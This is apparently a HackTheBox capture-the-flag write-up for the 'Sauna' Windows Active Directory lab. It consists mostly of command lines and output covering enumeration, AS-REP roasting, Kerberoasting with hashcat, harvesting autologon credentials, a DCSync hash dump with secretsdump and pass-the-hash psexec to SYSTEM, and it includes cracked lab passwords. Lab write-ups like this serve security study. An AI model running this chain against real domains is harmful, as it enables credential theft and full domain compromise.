WriteupsHTB — Sauna
ADEasyWindows
HTB — Sauna
ASREPRoasting on user names enumerated from the bank website. DCSync attack via GenericAll rights for Domain Admin hash dump.
January 20, 2025HackTheBox
#AD#ASREPRoasting#DCSync#Kerberos
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.175
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 18:33 EST
Stats: 0:02:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 18:36 (0:00:00 remaining)
Nmap scan report for 10.10.10.175
Host is up (0.022s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-21 06:34:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-21T06:35:45
|_ start_date: N/A
|_clock-skew: 7h00m02s
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 18.55 ms 10.10.14.1
2 18.60 ms 10.10.10.175
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.02 seconds
80
sh
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACEbuster
sh
feroxbuster -u http://10.10.10.175
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.175
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 150c http://10.10.10.175/images => http://10.10.10.175/images/
301 GET 2l 10w 147c http://10.10.10.175/css => http://10.10.10.175/css/
200 GET 2337l 3940w 37414c http://10.10.10.175/css/font-awesome.css
200 GET 385l 1324w 14226c http://10.10.10.175/css/slider.css
200 GET 640l 1767w 30954c http://10.10.10.175/about.html
200 GET 683l 1813w 32797c http://10.10.10.175/index.html
200 GET 325l 770w 15634c http://10.10.10.175/contact.html
200 GET 2168l 4106w 37019c http://10.10.10.175/css/style.css
200 GET 111l 661w 50106c http://10.10.10.175/images/t1.jpg
200 GET 470l 1279w 24695c http://10.10.10.175/blog.html
200 GET 144l 850w 71769c http://10.10.10.175/images/t2.jpg
200 GET 684l 1814w 38059c http://10.10.10.175/single.html
200 GET 122l 750w 60163c http://10.10.10.175/images/t4.jpg
200 GET 138l 940w 76395c http://10.10.10.175/images/t3.jpg
200 GET 389l 1987w 159728c http://10.10.10.175/images/ab.jpg
301 GET 2l 10w 150c http://10.10.10.175/Images => http://10.10.10.175/Images/
200 GET 268l 2037w 191775c http://10.10.10.175/images/skill2.jpg
200 GET 657l 3746w 345763c http://10.10.10.175/images/skill1.jpg
200 GET 8975l 17530w 178152c http://10.10.10.175/css/bootstrap.css
200 GET 683l 1813w 32797c http://10.10.10.175/
301 GET 2l 10w 149c http://10.10.10.175/fonts => http://10.10.10.175/fonts/
301 GET 2l 10w 147c http://10.10.10.175/CSS => http://10.10.10.175/CSS/
301 GET 2l 10w 147c http://10.10.10.175/Css => http://10.10.10.175/Css/
301 GET 2l 10w 150c http://10.10.10.175/IMAGES => http://10.10.10.175/IMAGES/
301 GET 2l 10w 149c http://10.10.10.175/Fonts => http://10.10.10.175/Fonts/
400 GET 6l 26w 324c http://10.10.10.175/error%1F_log
400 GET 6l 26w 324c http://10.10.10.175/images/error%1F_log
400 GET 6l 26w 324c http://10.10.10.175/CSS/error%1F_log
400 GET 6l 26w 324c http://10.10.10.175/css/error%1F_log
400 GET 6l 26w 324c http://10.10.10.175/Images/error%1F_log
400 GET 6l 26w 324c http://10.10.10.175/fonts/error%1F_log
400 GET 6l 26w 324c http://10.10.10.175/Css/error%1F_log
400 GET 6l 26w 324c http://10.10.10.175/IMAGES/error%1F_log
400 GET 6l 26w 324c http://10.10.10.175/Fonts/error%1F_log
[####################] - 83s 270038/270038 0s found:34 errors:2
[####################] - 81s 30000/30000 372/s http://10.10.10.175/
[####################] - 80s 30000/30000 373/s http://10.10.10.175/images/
[####################] - 80s 30000/30000 373/s http://10.10.10.175/css/
[####################] - 80s 30000/30000 374/s http://10.10.10.175/Images/
[####################] - 81s 30000/30000 372/s http://10.10.10.175/fonts/
[####################] - 79s 30000/30000 379/s http://10.10.10.175/CSS/
[####################] - 79s 30000/30000 378/s http://10.10.10.175/Css/
[####################] - 78s 30000/30000 385/s http://10.10.10.175/IMAGES/
[####################] - 75s 30000/30000 399/s http://10.10.10.175/Fonts/ 445
sh
445/tcp open microsoft-ds?sh
smbclient -N -L \\\\10.10.10.175
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availablesh
smbclient -N -L \\\\10.10.10.175 -U 'guest'
session setup failed: NT_STATUS_LOGON_FAILURErpcclient
sh
rpcclient -U "" 10.10.10.175
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILUREsh
cat users.txt
Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driversh
/opt/username-anarchy/username-anarchy -i users.txt
fergus
fergussmith
fergus.smith
fergussm
fergsmit
ferguss
f.smith
fsmith
sfergus
s.fergus
smithf
smith
smith.f
smith.fergus
fs
hugo
hugobear
hugo.bear
hugob
h.bear
hbear
bhugo
b.hugo
bearh
bear
bear.h
bear.hugo
hb
steven
stevenkerb
steven.kerb
stevenke
stevkerb
stevenk
s.kerb
skerb
ksteven
k.steven
kerbs
kerb
kerb.s
kerb.steven
sk
shaun
shauncoins
shaun.coins
shauncoi
shaucoin
shaunc
s.coins
scoins
cshaun
c.shaun
coinss
coins
coins.s
coins.shaun
sc
bowie
bowietaylor
bowie.taylor
bowietay
bowitayl
bowiet
b.taylor
btaylor
tbowie
t.bowie
taylorb
taylor
taylor.b
taylor.bowie
bt
sophie
sophiedriver
sophie.driver
sophiedr
sophdriv
sophied
s.driver
sdriver
dsophie
d.sophie
drivers
driver
driver.s
driver.sophie
sd
kerbrute
sh
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 potential_usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 01/20/25 - Ronnie Flathers @ropnop
2025/01/20 18:47:08 > Using KDC(s):
2025/01/20 18:47:08 > 10.10.10.175:88
2025/01/20 18:47:08 > [+] fsmith has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$fsmith@EGOTISTICAL-BANK.LOCAL:7dd9ca66...$6dc6ce60ed7f7f79cb7cb9ab8f822d29900c78da59b30a65b4e2ef2caa67feecac23a14734704122782944c647bd87ab89bc34221334cf61a056785d46d5e3b18d17783e867e70e8ec6d2569566445d270ffe7cfde1cb3b08f5b33c1ea7469f05fcd981269e0dbbbe4deb148e6e43748035c19346ee2b7f7977cd5456c60a5451d5ffb9b4ec22c0e34cebbb0f2d8875d12a471d19f7d691607b7582da14f48252d282c3422943e4bb5e89137a586fd83b447ae0d10ee18f0494ac8bf647b32d26d48ba38bae1e642987eeb6f021d33a76c2fac359f3bd4bb51932180301ada5f1c03b3643ff346510161998e1b02a9488b768971159344a36e2c2c8b3538f24daa54b5ee24ecf8e01b634755e89c4e755a5135e9479f
2025/01/20 18:47:08 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCALasrep
- kerbrute hash
sh
GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -no-pass -usersfile potential_usernames.txt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:60691c66...$f86389b730723e0f84d43b4bfc12cf54a78a6b6624f48cf77b5d59d4f1bcabd8b6beebebde9d7d95037c1db7a0cc2c05c9e97c216bbaa79a4300cbf419481e4e582f9d0827bc42d7d9b0d2d9cde7b42f69430192138302ff80f60bebefa973c148f95ce1b662e7c2b8eb6532073d91bd37fd6623da8071824730f1cd0cfd820e66b8655747e031304f43457a8c88f6fcfaab70a869c0adea203a5b79c6960a909ab67db123cee8582a56ee545c287791a1fbeeaea828d1be39477808a0c1d5ad6ab8fde0dffa40cef886218ce265d00a657f98388932e7827582c27d89340ee087ec82176477ea2d11710878ef50e70654d7aba25b4b57c2214eafc6731b2f37sh
hashcat -m 18200 fsmith_asrep.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:60691c66...$f86389b730723e0f84d43b4bfc12cf54a78a6b6624f48cf77b5d59d4f1bcabd8b6beebebde9d7d95037c1db7a0cc2c05c9e97c216bbaa79a4300cbf419481e4e582f9d0827bc42d7d9b0d2d9cde7b42f69430192138302ff80f60bebefa973c148f95ce1b662e7c2b8eb6532073d91bd37fd6623da8071824730f1cd0cfd820e66b8655747e031304f43457a8c88f6fcfaab70a869c0adea203a5b79c6960a909ab67db123cee8582a56ee545c287791a1fbeeaea828d1be39477808a0c1d5ad6ab8fde0dffa40cef886218ce265d00a657f98388932e7827582c27d89340ee087ec82176477ea2d11710878ef50e70654d7aba25b4b57c2214eafc6731b2f37:Thestrokes23creds
fsmith:Thestrokes23
sh
nxc smb 10.10.10.175 -u fsmith -p 'Thestrokes23'
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 sh
nxc winrm 10.10.10.175 -u fsmith -p 'Thestrokes23'
WINRM 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)winrm
sh
evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23sh
evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmithuser.txt
sh
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
f26ad217...bloodhound
sh
sudo bloodhound-python -u 'fsmith' -p 'Thestrokes23' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c allsh
zip -r EGOTISTICAL-BANK.LOCAL.zip *.jsonsh
sudo neo4j console
sudo bloodhoundkerberoastable

kerberoasting
sh
sudo timedatectl set-ntp off
sudo ntpdate 10.10.10.175 & GetUserSPNs.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith -request-user hsmith
[1] 1334773
2025-01-21 02:20:05.837534 (-0500) +25203.133355 +/- 0.010115 10.10.10.175 s1 no-leap
CLOCK: time stepped by 25203.133355
[1] + done sudo ntpdate 10.10.10.175
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------------------- ------ -------- -------------------------- --------- ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111 HSmith 2020-01-23 00:54:34.140321 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$f2d351a2...$3f2d88160258b53901293cc9eff4a94f6c01107eb93624934f9035d51ad6eecb622d21e95930e5a634f14f6e7559dd89fdb2bfac8babad323573a843eec04f4970df223e3ad851bcb6dd92e87ee64ae13cdef85e49716680bb9c55336d01b0edc71537b6cdef3bd2f6386131d9cdfbe4ed9269b21ad7df7382f8d24461d11fc19410528ae3314890f59eef71b75c46fcffc4f513b2aa4ef514a2ae82d665a4623868608af6083d8df2aa6e30dbcaa4090adc3fe91bf5a118b4a8e5d8053d32a2d4b8e7f56db3eda38cd39dc224575e03bc7b29e18a645d2925dbe812007c8d5ba56323d1186f2903f71ce9a1c94df57ec5ecb4ebc2c499f1fe739aebabc5ac57fcde7af70d781cd51fd9360640e7c641ff087de70865c91617fdbe32b1c6fe7cd7e94181b62a2125eac033afb6b2901fa0fb861738b196822e60ffc06f73879be95ad724c72833920bff263154d18c1ba34295aed94848a7fb606b88fcf8ebbf6faed3cddb41e81dd7b4f9d595df1dd9e4a12c7455a538d1a723c7a8d63b6266d19c9a497bdedd69c6ca29ebfae198b194e09689837d6e13c9c545152b40f26c9842ffd3a9a05f80e88a3f0b51b5735648de034af726531dc7f0aaac28578fe51f4700678407a67cd8e6f10564c6fcde7cd12ad30547262c8bbe4c1e6fac316baba2922ec24857fa8c622811cbf0b2f7de837794f65625e80b29801c561f2d694f49ff2e51372acc1ab96670f28ae92d4319f80f8c46a59f746323a699fb2ae3213cdd234ee2cc8eb857e913d907db56df9c42422143b0ef349c9d2cc747463036b927c624f49e9b58c5faf8ecc5a8b940ba22570702ef84fd7a00f401f3657f2633cd6788ca340a82bb9a36de2d2a46acc73fc903e4966fa9b423e7a305c4bdcba80ed20b7223c5c544fac80edf39b5dca31c54924246b5cf0aeb3b703c7bbbf7f8d1e021e5ef29263946d5514bf4b3e821dfe01723d8a9e4dfc815c41c62b41280b6b1b20acfd0c53d4b520d65bbf15859c3883d903853c317344c81296da6e594d0e04c953b648a485d9d73abe52f0939bafc91b09520a53ac72ba3a74d4b6c4000a94d9f312538b22bfe59ca84af6d0d11040150ad1d9e9b98b12e0670d2359c2e41c10e1010ce3cf237c1d5a1aa3ea0cc2e4c4ad2e6adbade4af189a2d05803332bb393e46880159b7d9834311d634c1c924865c430bd80b632b83d93fdaa32926bfeb6ece8ae925ba69a785345854ed5b41b8ccb8c4665750bae2e45bd8edd21cc8e499e06e5d8b30d421e13772df2fb9e93d6eeefdfab5ea5cafee166ca599b657e2f968bdf3da618c35880a396e95f24380d1700e5256129a78a51fd5093480f8a26fdb534be570fd334f9fe12c634d41816ffe37db069dfb4f36f55d35cedfc47
code
hashcat -m 13100 hsmith.tgs /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$f2d351a2...$3f2d88160258b53901293cc9eff4a94f6c01107eb93624934f9035d51ad6eecb622d21e95930e5a634f14f6e7559dd89fdb2bfac8babad323573a843eec04f4970df223e3ad851bcb6dd92e87ee64ae13cdef85e49716680bb9c55336d01b0edc71537b6cdef3bd2f6386131d9cdfbe4ed9269b21ad7df7382f8d24461d11fc19410528ae3314890f59eef71b75c46fcffc4f513b2aa4ef514a2ae82d665a4623868608af6083d8df2aa6e30dbcaa4090adc3fe91bf5a118b4a8e5d8053d32a2d4b8e7f56db3eda38cd39dc224575e03bc7b29e18a645d2925dbe812007c8d5ba56323d1186f2903f71ce9a1c94df57ec5ecb4ebc2c499f1fe739aebabc5ac57fcde7af70d781cd51fd9360640e7c641ff087de70865c91617fdbe32b1c6fe7cd7e94181b62a2125eac033afb6b2901fa0fb861738b196822e60ffc06f73879be95ad724c72833920bff263154d18c1ba34295aed94848a7fb606b88fcf8ebbf6faed3cddb41e81dd7b4f9d595df1dd9e4a12c7455a538d1a723c7a8d63b6266d19c9a497bdedd69c6ca29ebfae198b194e09689837d6e13c9c545152b40f26c9842ffd3a9a05f80e88a3f0b51b5735648de034af726531dc7f0aaac28578fe51f4700678407a67cd8e6f10564c6fcde7cd12ad30547262c8bbe4c1e6fac316baba2922ec24857fa8c622811cbf0b2f7de837794f65625e80b29801c561f2d694f49ff2e51372acc1ab96670f28ae92d4319f80f8c46a59f746323a699fb2ae3213cdd234ee2cc8eb857e913d907db56df9c42422143b0ef349c9d2cc747463036b927c624f49e9b58c5faf8ecc5a8b940ba22570702ef84fd7a00f401f3657f2633cd6788ca340a82bb9a36de2d2a46acc73fc903e4966fa9b423e7a305c4bdcba80ed20b7223c5c544fac80edf39b5dca31c54924246b5cf0aeb3b703c7bbbf7f8d1e021e5ef29263946d5514bf4b3e821dfe01723d8a9e4dfc815c41c62b41280b6b1b20acfd0c53d4b520d65bbf15859c3883d903853c317344c81296da6e594d0e04c953b648a485d9d73abe52f0939bafc91b09520a53ac72ba3a74d4b6c4000a94d9f312538b22bfe59ca84af6d0d11040150ad1d9e9b98b12e0670d2359c2e41c10e1010ce3cf237c1d5a1aa3ea0cc2e4c4ad2e6adbade4af189a2d05803332bb393e46880159b7d9834311d634c1c924865c430bd80b632b83d93fdaa32926bfeb6ece8ae925ba69a785345854ed5b41b8ccb8c4665750bae2e45bd8edd21cc8e499e06e5d8b30d421e13772df2fb9e93d6eeefdfab5ea5cafee166ca599b657e2f968bdf3da618c35880a396e95f24380d1700e5256129a78a51fd5093480f8a26fdb534be570fd334f9fe12c634d41816ffe37db069dfb4f36f55d35cedfc47:Thestrokes23
creds
hsmith:Thestrokes23
sh
nxc smb 10.10.10.175 -u hsmith -p 'Thestrokes23'
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\hsmith:Thestrokes23 hsmith share
sh
nxc smb 10.10.10.175 -u hsmith -p 'Thestrokes23' --shares
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\hsmith:Thestrokes23
SMB 10.10.10.175 445 SAUNA [*] Enumerated shares
SMB 10.10.10.175 445 SAUNA Share Permissions Remark
SMB 10.10.10.175 445 SAUNA ----- ----------- ------
SMB 10.10.10.175 445 SAUNA ADMIN$ Remote Admin
SMB 10.10.10.175 445 SAUNA C$ Default share
SMB 10.10.10.175 445 SAUNA IPC$ READ Remote IPC
SMB 10.10.10.175 445 SAUNA NETLOGON READ Logon server share
SMB 10.10.10.175 445 SAUNA print$ READ Printer Drivers
SMB 10.10.10.175 445 SAUNA RICOH Aficio SP 8300DN PCL 6 WRITE We cant print money
SMB 10.10.10.175 445 SAUNA SYSVOL READ Logon server sharewinpeas
Autologon credentials
sh
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
sh
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
sh
nxc smb 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
SMB 10.10.10.175 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.175 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!creds
svc_loanmgr:Moneymakestheworldgoround!
winrm
sh
nxc winrm 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
WINRM 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)sh
evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'DCSync
sh
impacket-secretsdump 'EGOTISTICAL-BANK.LOCALl'/'svc_loanmgr':'Moneymakestheworldgoround!'@'10.10.10.175'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435...:82345207...:::
Guest:501:aad3b435...:31d6cfe0...:::
krbtgt:502:aad3b435...:4a889942...:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435...:58a52d36...:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435...:58a52d36...:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435...:9cb31797...:::
SAUNA$:1000:aad3b435...:f96e2380...:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c...
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894d...
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b0...
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b0744...
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31...
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:de6dc38f62b196b8c5fe9a98e6a883e17558431c71e41e3a1a103a8b8ac5d7ed
SAUNA$:aes128-cts-hmac-sha1-96:3fda1ccf...
SAUNA$:des-cbc-md5:104c515b86739e08
sh
impacket-psexec administrator@10.10.10.175 -hashes :82345207...
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file JnTHYKTA.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service DjUm on 10.10.10.175.....
[*] Starting service DjUm.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\systemroot.txt
sh
C:\Users\Administrator\Desktop> type root.txt
7c7a9782...Up next
MediumJan 2025
HTB — Monteverde
Azure AD Connect with user enumeration via RPC. Password spraying finds default creds. Azure AD Sync password extraction for Domain Admin.
Read writeup
EasyJan 2025
HTB — Timelapse
SMB share contains ZIP with password-protected PFX certificate. Cracked PFX used for WinRM. LAPS password read via LDAP for Administrator.
Read writeup
HardJan 2025
HTB — Flight
LFI via lang parameter captures NTLM hash with Responder. Password spray, IIS WebDAV shell upload, RunasCs for lateral movement to Domain Admin.
Read writeup